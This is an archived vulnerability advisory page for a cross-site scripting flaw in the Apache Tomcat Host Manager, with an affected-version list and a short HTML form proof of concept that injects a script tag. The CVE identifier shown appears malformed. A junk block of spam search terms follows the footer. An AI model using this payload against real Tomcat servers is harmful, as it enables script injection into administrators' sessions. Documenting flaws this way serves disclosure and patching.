about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Apache Tomcat Host Manager Cross Site Scripting Vulnerability


Title Apache Tomcat Host Manager Cross Site Scripting Vulnerability
Published 2008-06-02-12:00AM
Updated 2008-09-17-10:50AM
Class Input Validation Error
CVE   CVE-2008-194
Remote  Yes
Local  No
Credit  Petr Splichal of RedHat
Vulnerable  S.u.S.E. SUSE Linux Enterprise Server 10 SP2
S.u.S.E. SUSE Linux Enterprise Server 10 SP1
S.u.S.E. openSUSE 11.0
S.u.S.E. openSUSE 10.3
S.u.S.E. openSUSE 10.2
RedHat Fedora 9 0
RedHat Fedora 8 0
RedHat Enterprise Linux Desktop Workstation 5 client
RedHat Enterprise Linux Desktop 5 client
RedHat Enterprise Linux 5 server
MandrakeSoft Linux Mandrake 2008.1 x86_64
MandrakeSoft Linux Mandrake 2008.1
MandrakeSoft Linux Mandrake 2008.0 x86_64
MandrakeSoft Linux Mandrake 2008.0
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 ia64
Debian Linux 4.0 ia32
Debian Linux 4.0 hppa
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0
Apache Software Foundation Tomcat 6.0.16
Apache Software Foundation Tomcat 6.0.15
Apache Software Foundation Tomcat 6.0.14
Apache Software Foundation Tomcat 6.0.13
Apache Software Foundation Tomcat 6.0.12
Apache Software Foundation Tomcat 6.0.11
Apache Software Foundation Tomcat 6.0.10
Apache Software Foundation Tomcat 6.0.9
Apache Software Foundation Tomcat 6.0.8
Apache Software Foundation Tomcat 6.0.7
Apache Software Foundation Tomcat 6.0.6
Apache Software Foundation Tomcat 6.0.5
Apache Software Foundation Tomcat 6.0.4
Apache Software Foundation Tomcat 6.0.3
Apache Software Foundation Tomcat 6.0.2
Apache Software Foundation Tomcat 6.0.1
Apache Software Foundation Tomcat 6.0
Apache Software Foundation Tomcat 5.5.26
Apache Software Foundation Tomcat 5.5.25
Apache Software Foundation Tomcat 5.5.24
Apache Software Foundation Tomcat 5.5.23
Apache Software Foundation Tomcat 5.5.22
Apache Software Foundation Tomcat 5.5.21
Apache Software Foundation Tomcat 5.5.20
Gentoo Linux 1.4 _rc3
Gentoo Linux 1.4 _rc2
Gentoo Linux 1.4 _rc1
Gentoo Linux 1.2
Apache Software Foundation Tomcat 5.5.19
Apache Software Foundation Tomcat 5.5.18
Apache Software Foundation Tomcat 5.5.17
Apache Software Foundation Tomcat 5.5.16
Apache Software Foundation Tomcat 5.5.15
Apache Software Foundation Tomcat 5.5.14
Apache Software Foundation Tomcat 5.5.13
Apache Software Foundation Tomcat 5.5.12
Apache Software Foundation Tomcat 5.5.11
Apache Software Foundation Tomcat 5.5.10
Apache Software Foundation Tomcat 5.5.9
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following proof of concept is available:<form action="http://localhost:8080/host-manager/html/add" method="get">
<INPUT TYPE="hidden" NAME='name' VALUE="<script>alert()</script>">
<INPUT TYPE="hidden" NAME='aliases' VALUE="somealias">
<input type="submit">
</form>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 23:52:41 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.kevin@ Vidio l rctv+venez hi.baidu.c news for c WWW sexygi apache 1.3 cisco ntp india.xex ycthzj.cn Crack+Data lo888l pwpshp wiki max19.com Www.Sexy+g j2ee Kamapisach Sux89 Helpdesk P Crack Data jshuwei.or n...xt???? Www.tamilh wow forum free desi wwwintheVI www.010dit Xochielt freevedeos Tatie Pitcher se www,sexker www.010dit sneha both Lezbiyen www.swanca search/exp 5.1.5 n...xt???? fuckinggir n...xt???? bb5 tushy clas bolliwoods www.sffrp. Chicas fol Sexi vedio Www.sax300 club video